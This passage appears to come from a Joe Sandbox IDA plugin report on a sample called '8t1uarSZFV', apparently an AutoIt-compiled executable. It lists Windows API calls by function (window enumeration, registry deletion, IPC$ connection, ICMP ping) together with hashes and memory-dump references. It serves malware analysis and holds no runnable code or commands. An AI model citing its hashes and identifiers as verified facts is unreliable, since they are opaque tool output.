              • Part of subcall function 00FD29C8: GetLastError.KERNEL32(00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000,00000000), ref: 00FD29F0
            • _free.LIBCMT ref: 00FDDAB8
            • _free.LIBCMT ref: 00FDDACD
            • _free.LIBCMT ref: 00FDDAD8
            • _free.LIBCMT ref: 00FDDAFA
            • _free.LIBCMT ref: 00FDDB0D
            • _free.LIBCMT ref: 00FDDB1B
            • _free.LIBCMT ref: 00FDDB26
            • _free.LIBCMT ref: 00FDDB5E
            • _free.LIBCMT ref: 00FDDB65
            • _free.LIBCMT ref: 00FDDB82
            • _free.LIBCMT ref: 00FDDB9A
            Similarity
            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
            • String ID:
            • API String ID: 161543041-0
            APIs
            • GetClassNameW.USER32(?,?,00000100), ref: 0100369C
            • _wcslen.LIBCMT ref: 010036A7
            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 01003797
            • GetClassNameW.USER32(?,?,00000400), ref: 0100380C
            • GetDlgCtrlID.USER32(?), ref: 0100385D
            • GetWindowRect.USER32(?,?), ref: 01003882
            • GetParent.USER32(?), ref: 010038A0
            • ScreenToClient.USER32(00000000), ref: 010038A7
            • GetClassNameW.USER32(?,?,00000100), ref: 01003921
            • GetWindowTextW.USER32(?,?,00000400), ref: 0100395D
            Similarity
            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
            • String ID: %s%u
            • API String ID: 4010501982-679674701
            APIs
            • GetClassNameW.USER32(?,?,00000400), ref: 01004994
            • GetWindowTextW.USER32(?,?,00000400), ref: 010049DA
            • _wcslen.LIBCMT ref: 010049EB
            • CharUpperBuffW.USER32(?,00000000), ref: 010049F7
            • _wcsstr.LIBVCRUNTIME ref: 01004A2C
            • GetClassNameW.USER32(00000018,?,00000400), ref: 01004A64
            • GetWindowTextW.USER32(?,?,00000400), ref: 01004A9D
            • GetClassNameW.USER32(00000018,?,00000400), ref: 01004AE6
            • GetClassNameW.USER32(?,?,00000400), ref: 01004B20
            • GetWindowRect.USER32(?,?), ref: 01004B8B
            Similarity
            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
            • String ID: ThumbnailClass
            • API String ID: 1311036022-1241985126
            APIs
              • Part of subcall function 00FB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB9BB2
            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 01038D5A
            • GetFocus.USER32 ref: 01038D6A
            • GetDlgCtrlID.USER32(00000000), ref: 01038D75
            • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 01038E1D
            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 01038ECF
            • GetMenuItemCount.USER32(?), ref: 01038EEC
            • GetMenuItemID.USER32(?,00000000), ref: 01038EFC
            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 01038F2E
            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 01038F70
            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 01038FA1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
             • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
            • String ID: 0
            • API String ID: 1026556194-4108050209
            • Opcode ID: 9bd47d0493c2801ddb9256339d9a5e7e9239132f6a6d94b1dd6f90584cc2100b
            • Instruction ID: 116ee3e6221affa3337f65351d156dd66b29c566eebb61ac42a56395c9ab6a25
            • Opcode Fuzzy Hash: 9bd47d0493c2801ddb9256339d9a5e7e9239132f6a6d94b1dd6f90584cc2100b
            • Instruction Fuzzy Hash: 5C819D71508301AFE761DF28C884AAB7BEDFBC8354F044A9AFAC5A7281D775D900CB61
            APIs
            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0102CC64
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0102CC8D
            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0102CD48
              • Part of subcall function 0102CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0102CCAA
              • Part of subcall function 0102CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0102CCBD
              • Part of subcall function 0102CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0102CCCF
              • Part of subcall function 0102CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0102CD05
              • Part of subcall function 0102CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0102CD28
            • RegDeleteKeyW.ADVAPI32(?,?), ref: 0102CCF3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
             • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
            • String ID: RegDeleteKeyExW$advapi32.dll
            • API String ID: 2734957052-4033151799
            • Opcode ID: 96e1d07fb4f310b88399b45485f0625b7b5a2acb0857b9700aa88a5d947dc069
            • Instruction ID: 94c489b0b8af3826614ed6dd1749d4b7e3ba9b2b3888f88391cfbff69d628a78
            • Opcode Fuzzy Hash: 96e1d07fb4f310b88399b45485f0625b7b5a2acb0857b9700aa88a5d947dc069
            • Instruction Fuzzy Hash: F2318075901129BBF7319A65DE88EFFBFBCEF06640F0001A6F981E3104D7749A459BA0
            APIs
            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 01013D40
            • _wcslen.LIBCMT ref: 01013D6D
            • CreateDirectoryW.KERNEL32(?,00000000), ref: 01013D9D
            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 01013DBE
            • RemoveDirectoryW.KERNEL32(?), ref: 01013DCE
            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 01013E55
            • CloseHandle.KERNEL32(00000000), ref: 01013E60
            • CloseHandle.KERNEL32(00000000), ref: 01013E6B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
             • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
            • String ID: :$\$\??\%s
            • API String ID: 1149970189-3457252023
            • Opcode ID: 928d03d18d078e5f74d51cbcf02b9c9c5d975202d729bab5cd3c4ff22d620219
            • Instruction ID: f65bfe5ee302cce673aa0807ea2eddff6af0dc207d792805652addb5419dc4f8
            • Opcode Fuzzy Hash: 928d03d18d078e5f74d51cbcf02b9c9c5d975202d729bab5cd3c4ff22d620219
            • Instruction Fuzzy Hash: B331C8715001096BDB21AFA4DD49FEF37BCFF88710F5040B6F549E6054E77892448B64
            APIs
            • timeGetTime.WINMM ref: 0100E6B4
              • Part of subcall function 00FBE551: timeGetTime.WINMM(?,?,0100E6D4), ref: 00FBE555
            • Sleep.KERNEL32(0000000A), ref: 0100E6E1
            • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0100E705
            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0100E727
            • SetActiveWindow.USER32 ref: 0100E746
            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0100E754
            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0100E773
            • Sleep.KERNEL32(000000FA), ref: 0100E77E
            • IsWindow.USER32 ref: 0100E78A
            • EndDialog.USER32(00000000), ref: 0100E79B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
             • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
            • String ID: BUTTON
            • API String ID: 1194449130-3405671355
            • Opcode ID: 7991288ab44d22181f6f6956fe44695b5e79c7991035396d0680c3eb679f1787
            • Instruction ID: 58d66b42ef1ace4f71cab144184a5e86bfb2ef30cd47d1e2ce1b6305c76ad00a
            • Opcode Fuzzy Hash: 7991288ab44d22181f6f6956fe44695b5e79c7991035396d0680c3eb679f1787
            • Instruction Fuzzy Hash: A2218170600205AFFB226F24ED89A293BADF749349F144826F5C6F11C9DB7BAC109B25
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0100EA5D
            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0100EA73
            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0100EA84
            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0100EA96
            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0100EAA7
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
             • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: SendString$_wcslen
            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
            • API String ID: 2420728520-1007645807
            • Opcode ID: b29c4ab1449a4a2c8c8a741548940c1e0597ed102bbea523cb115960001959d5
            • Instruction ID: c7f397b0c19554048212ad22326fe30060d3fbd795ab8073b6a07c8fb553c81b
            • Opcode Fuzzy Hash: b29c4ab1449a4a2c8c8a741548940c1e0597ed102bbea523cb115960001959d5
            • Instruction Fuzzy Hash: 5311A371A5022979E721A7A6DC4ADFF7ABCEBC7B00F04083D7841A60D1EFA11945C5B1
            APIs
              • Part of subcall function 00FB8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FB8BE8,?,00000000,?,?,?,?,00FB8BBA,00000000,?), ref: 00FB8FC5
            • DestroyWindow.USER32(?), ref: 00FB8C81
            • KillTimer.USER32(00000000,?,?,?,?,00FB8BBA,00000000,?), ref: 00FB8D1B
            • DestroyAcceleratorTable.USER32(00000000), ref: 00FF6973
            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00FB8BBA,00000000,?), ref: 00FF69A1
            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00FB8BBA,00000000,?), ref: 00FF69B8
            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00FB8BBA,00000000), ref: 00FF69D4
            • DeleteObject.GDI32(00000000), ref: 00FF69E6
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
             • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
            • String ID:
            • API String ID: 641708696-0
            • Opcode ID: afea97e86ed9b63f6e728c59b30457abf453cc43b47b6e5712cc4cbe685cb78c
            • Instruction ID: 2fb51ae88822da8588ff1df0fd0c80e1d3c1bd91374f95f1c8479c75c488dc21
            • Opcode Fuzzy Hash: afea97e86ed9b63f6e728c59b30457abf453cc43b47b6e5712cc4cbe685cb78c
            • Instruction Fuzzy Hash: FC61EEB1901605DFDB318F16CA48BB57BF9FF80362F144519E082A75A4CB7AA882EF50
            APIs
              • Part of subcall function 00FB9944: GetWindowLongW.USER32(?,000000EB), ref: 00FB9952
            • GetSysColor.USER32(0000000F), ref: 00FB9862
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
             • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ColorLongWindow
            • String ID:
            • API String ID: 259745315-0
            • Opcode ID: cd023184bf785b5d1fa54c408cd7c72d1abd5f95018c72e1e1a1c2131ed3bf02
            • Instruction ID: 1d697ac8c6c7b5739637615b8aa0765c10ffbd5545905df8cf3105429801436e
            • Opcode Fuzzy Hash: cd023184bf785b5d1fa54c408cd7c72d1abd5f95018c72e1e1a1c2131ed3bf02
            • Instruction Fuzzy Hash: 12419231508644AFEB315F399884BF93B79AB06330F584616FAA2971E5C775DC41FB10
            APIs
            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00FEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 01009717
            • LoadStringW.USER32(00000000,?,00FEF7F8,00000001), ref: 01009720
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00FEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 01009742
            • LoadStringW.USER32(00000000,?,00FEF7F8,00000001), ref: 01009745
            • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 01009866
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
             • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: HandleLoadModuleString$Message_wcslen
            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
            • API String ID: 747408836-2268648507
            • Opcode ID: d603b556bce80157f4d9d95149b9d15599cfc4e6fbd5c968d5d9455fdf02395b
            • Instruction ID: c9e01216a85655471edaed6439ea6082b4777bccf927c7e45df2d75f2bf8f110
            • Opcode Fuzzy Hash: d603b556bce80157f4d9d95149b9d15599cfc4e6fbd5c968d5d9455fdf02395b
            • Instruction Fuzzy Hash: 6F417FB2804219AADF05EBE1CE42DEE777CAF55344F504025F205B2092EF796F48DB61
            APIs
              • Part of subcall function 00FA6B57: _wcslen.LIBCMT ref: 00FA6B6A
            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 010007A2
            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 010007BE
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 010007DA
            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 01000804
            • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0100082C
            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 01000837
            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0100083C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
             • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
            • API String ID: 323675364-22481851
            • Opcode ID: 3d179f9f9999437ce0d2801c2fc526070b8c6b33f06d79bd456767f4579e8642
            • Instruction ID: 60e98cf77fdd39be993db5df0d2b6f547241b89f4be51aa26920659c48088529
            • Opcode Fuzzy Hash: 3d179f9f9999437ce0d2801c2fc526070b8c6b33f06d79bd456767f4579e8642
            • Instruction Fuzzy Hash: F44129B2C10229ABDF21EBA4DC85DEDB7B8BF05390F444169F941B3191EB385A04DBA0
            APIs
            • VariantInit.OLEAUT32(?), ref: 01023C5C
            • CoInitialize.OLE32(00000000), ref: 01023C8A
            • CoUninitialize.OLE32 ref: 01023C94
            • _wcslen.LIBCMT ref: 01023D2D
            • GetRunningObjectTable.OLE32(00000000,?), ref: 01023DB1
            • SetErrorMode.KERNEL32(00000001,00000029), ref: 01023ED5
            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 01023F0E
            • CoGetObject.OLE32(?,00000000,0103FB98,?), ref: 01023F2D
            • SetErrorMode.KERNEL32(00000000), ref: 01023F40
            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01023FC4
            • VariantClear.OLEAUT32(?), ref: 01023FD8
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
             • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
            • String ID:
            • API String ID: 429561992-0
            • Opcode ID: 840a1360b860ffb36612c73c743325e55f626d8a96a1f655293730ea91c5b5ee
            • Instruction ID: 5b957b9a037ea931291d6a66ea7a53a0327177a5a82c1acb3a4b994158e31b9f
            • Opcode Fuzzy Hash: 840a1360b860ffb36612c73c743325e55f626d8a96a1f655293730ea91c5b5ee
            • Instruction Fuzzy Hash: 8BC151B1608315AFD740DF68C88492BBBE9FF89748F00495DF98A9B250DB35ED05CB92
            APIs
            • CoInitialize.OLE32(00000000), ref: 01017AF3
            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 01017B8F
            • SHGetDesktopFolder.SHELL32(?), ref: 01017BA3
            • CoCreateInstance.OLE32(0103FD08,00000000,00000001,01066E6C,?), ref: 01017BEF
            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 01017C74
            • CoTaskMemFree.OLE32(?,?), ref: 01017CCC
            • SHBrowseForFolderW.SHELL32(?), ref: 01017D57
            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 01017D7A
            • CoTaskMemFree.OLE32(00000000), ref: 01017D81
            • CoTaskMemFree.OLE32(00000000), ref: 01017DD6
            • CoUninitialize.OLE32 ref: 01017DDC
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
             • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
            • String ID:
            • API String ID: 2762341140-0
            • Opcode ID: d5ad4a6b27fcd4017a3ab490f234743719c2ffa1d33eafc510f996b7c866183d
            • Instruction ID: 9011f71eef5d69d27a83554c699a6c0178658d79ea8c3bd7b835515d53aa9e12
            • Opcode Fuzzy Hash: d5ad4a6b27fcd4017a3ab490f234743719c2ffa1d33eafc510f996b7c866183d
            • Instruction Fuzzy Hash: E3C14A75A00109AFDB14DFA4C884DAEBBF9FF48314B148099F956EB261CB35EE41CB90
            APIs
            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01035504
            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01035515
            • CharNextW.USER32(00000158), ref: 01035544
            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01035585
            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0103559B
            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 010355AC
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
             • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$CharNext
            • String ID:
            • API String ID: 1350042424-0
            • Opcode ID: 31866a36d9932ed7f5a59c996ff7824c05d27769f66d4825ebef974a584fe117
            • Instruction ID: b48abc78f1973ea8313cffdcdc14d4ff78f20a31abab0461a517eee43de0875d
            • Opcode Fuzzy Hash: 31866a36d9932ed7f5a59c996ff7824c05d27769f66d4825ebef974a584fe117
            • Instruction Fuzzy Hash: C5618171A00209AFEF20CF55CC849FE7BBDEB8A724F004186F6A5A72A0D7759641DB60
            APIs
            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00FFFAAF
            • SafeArrayAllocData.OLEAUT32(?), ref: 00FFFB08
            • VariantInit.OLEAUT32(?), ref: 00FFFB1A
            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00FFFB3A
            • VariantCopy.OLEAUT32(?,?), ref: 00FFFB8D
            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00FFFBA1
            • VariantClear.OLEAUT32(?), ref: 00FFFBB6
            • SafeArrayDestroyData.OLEAUT32(?), ref: 00FFFBC3
            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FFFBCC
            • VariantClear.OLEAUT32(?), ref: 00FFFBDE
            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FFFBE9
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
             • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
            • String ID:
            • API String ID: 2706829360-0
            • Opcode ID: 35aedb968055f559735db7842cb11db0cb036acdd642ac7f918e330deafcd42c
            • Instruction ID: 5a135e751a7dd1af74f700414452caaab7c22b4a6fed41de32c3f1bc8c791d1f
            • Opcode Fuzzy Hash: 35aedb968055f559735db7842cb11db0cb036acdd642ac7f918e330deafcd42c
            • Instruction Fuzzy Hash: 22418F35A002199FDB10DF64C8549BEBBB9EF48354F008029EA46E7261CB39E945DFA0
            APIs
            • WSAStartup.WSOCK32(00000101,?), ref: 010205BC
            • inet_addr.WSOCK32(?), ref: 0102061C
            • gethostbyname.WSOCK32(?), ref: 01020628
            • IcmpCreateFile.IPHLPAPI ref: 01020636
            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 010206C6
            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 010206E5
            • IcmpCloseHandle.IPHLPAPI(?), ref: 010207B9
            • WSACleanup.WSOCK32 ref: 010207BF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
             • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
